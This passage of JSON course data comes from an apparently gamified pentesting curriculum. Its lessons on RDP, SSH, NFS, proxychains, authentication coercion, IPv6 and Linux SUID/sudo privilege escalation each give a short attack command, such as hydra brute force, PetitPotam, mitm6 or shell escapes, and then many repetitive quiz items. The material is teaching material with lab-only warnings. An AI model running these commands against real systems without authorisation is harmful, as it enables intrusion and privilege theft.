changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"rdp-atk","cat":"Network Attacks","title":"RDP Attacks","diff":1,"xp":100,"intro":"Brute force RDP.","sections":[{"type":"text","content":"Brute force RDP."},{"type":"code","lang":"bash","content":"hydra -l admin -P pass.txt rdp://target"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"RDP port?","opts":["22","445","3389","8080"],"ans":2},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"nfs-exploit","cat":"Network Attacks","title":"NFS Exploitation","diff":2,"xp":125,"intro":"Access NFS shares.","sections":[{"type":"text","content":"Access NFS shares."},{"type":"code","lang":"bash","content":"showmount -e target\nsudo mount -t nfs target:/share /mnt"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Root access NFS option?","opts":["rw","no_root_squash","sync","anonuid"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"ssh-atk","cat":"Network Attacks","title":"SSH Attacks","diff":1,"xp":100,"intro":"SSH brute force and exploitation.","sections":[{"type":"text","content":"SSH brute force and exploitation."},{"type":"code","lang":"bash","content":"hydra -l root -P pass.txt ssh://target"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Best SSH defense?","opts":["Complex pw","Key-based auth with password disabled","Port change","Rate limit"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"proxychain","cat":"Network Attacks","title":"Proxychains","diff":2,"xp":125,"intro":"Route through proxies.","sections":[{"type":"text","content":"Route through proxies."},{"type":"code","lang":"bash","content":"proxychains nmap -sT internal-host\nproxychains curl http://internal"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Proxychains protocol?","opts":["HTTP","SOCKS5","FTP","SMTP"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"netcat (nc) is often called...","opts":["The network knife","The TCP/IP Swiss Army knife","The packet sniffer","The port scanner"],"ans":1},{"type":"quiz","q":"Evil twin attack targets...","opts":["Bluetooth","Wi-Fi (fake AP with same SSID)","Ethernet","USB"],"ans":1},{"type":"quiz","q":"TTL in IP packets stands for...","opts":["Total Transfer Length","Time To Live","Transmission Type Label","Transport Tracking Log"],"ans":1},{"type":"quiz","q":"What does a firewall's default deny policy do?","opts":["Allows everything","Blocks everything not explicitly allowed","Logs everything","Encrypts everything"],"ans":1},{"type":"quiz","q":"MITM stands for...","opts":["Machine In The Middle","Man In The Middle","Module Integration Test Mode","Managed Internet Traffic Monitor"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"coerce-auth","cat":"Network Attacks","title":"Auth Coercion","diff":3,"xp":200,"intro":"Force machines to authenticate.","sections":[{"type":"text","content":"Force machines to authenticate."},{"type":"code","lang":"bash","content":"python3 PetitPotam.py attacker DC\npython3 printerbug.py domain/user:pass@DC attacker"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"Coercion forces?","opts":["PW change","Target authenticates to attacker","Restart","Log deletion"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"What layer do routers operate at?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":2},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"ipv6-atk","cat":"Network Attacks","title":"IPv6 Attacks","diff":3,"xp":200,"intro":"Exploit IPv6 on dual-stack.","sections":[{"type":"text","content":"Exploit IPv6 on dual-stack."},{"type":"code","lang":"bash","content":"sudo mitm6 -d target.domain"},{"type":"text","content":"Network attacks exploit trust in old protocols. ARP has no authentication, DNS isn't verified, broadcasts answer anyone. Understanding WHY teaches more than memorizing tools."},{"type":"tip","content":"Always practice on a controlled lab network. Never run MITM or ARP spoofing on networks you don't own."},{"type":"task","content":"Build a 3-VM lab: attacker, target, gateway. Practice a MITM attack, capture cleartext credentials, then defend with ARP inspection."},{"type":"quiz","q":"IPv6 blind spot?","opts":["Encrypted","Admins don't monitor IPv6","Slower","Special hardware"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"What protocol resolves IP to MAC?","opts":["DNS","DHCP","ARP","ICMP"],"ans":2},{"type":"quiz","q":"A rogue access point is...","opts":["A secured AP","A fake AP set up by an attacker","A government AP","An AP with no password"],"ans":1},{"type":"quiz","q":"Port 53 is used by...","opts":["HTTP","SSH","DNS","SMTP"],"ans":2},{"type":"quiz","q":"A TCP three-way handshake is...","opts":["SYN, ACK, FIN","SYN, SYN-ACK, ACK","ACK, SYN, RST","FIN, FIN-ACK, RST"],"ans":1},{"type":"quiz","q":"A VLAN isolates traffic at which layer?","opts":["Layer 1","Layer 2","Layer 3","Layer 7"],"ans":1},{"type":"quiz","q":"What does tcpdump capture?","opts":["Keystrokes","Network packets","File changes","Process activity"],"ans":1},{"type":"quiz","q":"Wireshark's display filter for HTTP is...","opts":["filter http","http","tcp.http","protocol=http"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["The router","The switch's CAM table","The firewall","DNS server"],"ans":1},{"type":"quiz","q":"DHCP starvation exhausts...","opts":["CPU","Available IP addresses","Bandwidth","Disk space"],"ans":1},{"type":"quiz","q":"ARP operates at layer...","opts":["3","4","2","7"],"ans":2},{"type":"quiz","q":"MITM requires being...","opts":["On another network","Between victim and server","At the server","Root on victim"],"ans":1},{"type":"quiz","q":"Ping uses...","opts":["TCP","UDP","ICMP","ARP"],"ans":2},{"type":"quiz","q":"Port 443 is...","opts":["HTTP","HTTPS","SSH","FTP"],"ans":1},{"type":"quiz","q":"SYN flood targets...","opts":["Disk","Connection table","CPU","RAM"],"ans":1},{"type":"quiz","q":"VLAN isolates at layer...","opts":["1","2","3","7"],"ans":1},{"type":"quiz","q":"tcpdump captures...","opts":["Keystrokes","Network packets","File changes","Processes"],"ans":1},{"type":"quiz","q":"MAC flooding targets...","opts":["Router","Switch CAM table","Firewall","DNS"],"ans":1},{"type":"quiz","q":"TCP handshake is...","opts":["SYN ACK FIN","SYN SYN-ACK ACK","ACK SYN RST","FIN FIN-ACK"],"ans":1},{"type":"quiz","q":"Routers operate at layer...","opts":["1","2","3","7"],"ans":2}]},{"id":"lin-suid","cat":"Privilege Escalation","title":"Linux SUID Binaries","diff":1,"xp":100,"intro":"Exploit SUID programs.","sections":[{"type":"text","content":"Exploit SUID programs."},{"type":"code","lang":"bash","content":"find / -perm -4000 -type f 2>/dev/null\nfind . -exec /bin/sh -p ;"},{"type":"text","content":"Privilege escalation is about finding the gap between what you can do and what the system allows. Misconfigurations, outdated software, and overly permissive settings create these gaps. The methodology matters more than the specific exploit: enumerate systematically, understand what you find, then choose the right technique."},{"type":"tip","content":"Run enumeration scripts (LinPEAS/WinPEAS) first, but don't just blindly follow their highlighted findings. Read the full output and understand WHY something is flagged. A SUID binary isn't automatically exploitable \u2014 you need to understand what it does and check GTFOBins for a known technique."},{"type":"task","content":"Download a vulnerable VM (e.g., Vulnhub's 'Basic Pentesting' or HackTheBox's beginner boxes). After getting initial access, spend at least 30 minutes manually enumerating BEFORE running any automated script. Write down every potential privesc vector you find, then compare your list with LinPEAS output."},{"type":"quiz","q":"SUID bit does?","opts":["Encrypts","Runs as file owner (root)","Compresses","Logs"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"lin-sudo","cat":"Privilege Escalation","title":"Linux Sudo Misconfig","diff":1,"xp":100,"intro":"Exploit sudo permissions.","sections":[{"type":"text","content":"Exploit sudo permissions."},{"type":"code","lang":"bash","content":"sudo -l\nsudo vim -c ':!bash'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"First sudo privesc command?","opts":["whoami","sudo -l","id","uname"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"What does 'id' command show?","opts":["IP address","User ID, group ID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can 